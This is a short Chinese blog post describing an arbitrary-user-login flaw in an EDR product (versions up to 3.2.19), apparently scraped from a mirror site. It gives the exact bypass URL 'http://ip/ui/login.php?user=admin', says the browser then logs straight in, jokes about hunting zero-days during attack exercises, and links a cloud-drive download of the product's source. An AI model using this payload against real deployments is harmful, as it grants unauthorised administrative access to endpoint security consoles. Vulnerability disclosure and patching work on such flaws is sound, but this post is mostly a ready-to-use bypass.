zoukankan      html  css  js  c++  java
  • xx服EDR任意用户登录

    0x00漏洞编号

    暂无

    0x01漏洞名称

    某某服EDR任意用户登录漏洞

    0x02影响范围

    EDR  <= v3.2.19

    0x03攻击方式

    攻击者可以通过构造payload绕过登录判断

    /ui/login.php?user=admin
    

    0x04复现过程

    找到一个

    浏览器直接输入

    url输入payload 成功进入

    http://ip/ui/login.php?user=admin  (大概是这样的)

    可以看到直接进来了

    0x05 总结

    hw期间0day满天飞,赶紧学习刷洞去,哈哈哈

    0x06 漏洞源码

    下载后直接导入虚拟机

    链接:https://pan.baidu.com/s/14c-5aw_NoK3wiztfchAg-w
    提取码:key8

  • 相关阅读:
    Scrapy框架
    爬虫高性能相关
    存储库之MongoDB
    存储库之redis
    beautifulsoup
    pyecharts
    wxpy模块
    Gin框架
    Python的rabbitMQ
    Vue基础
  • 原文地址:https://www.cnblogs.com/bflw/p/13533932.html
Copyright © 2011-2022 走看看